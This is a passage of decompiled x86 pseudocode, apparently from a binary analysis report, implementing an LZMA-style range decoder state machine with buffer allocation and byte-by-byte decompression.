						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4)); // executed
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
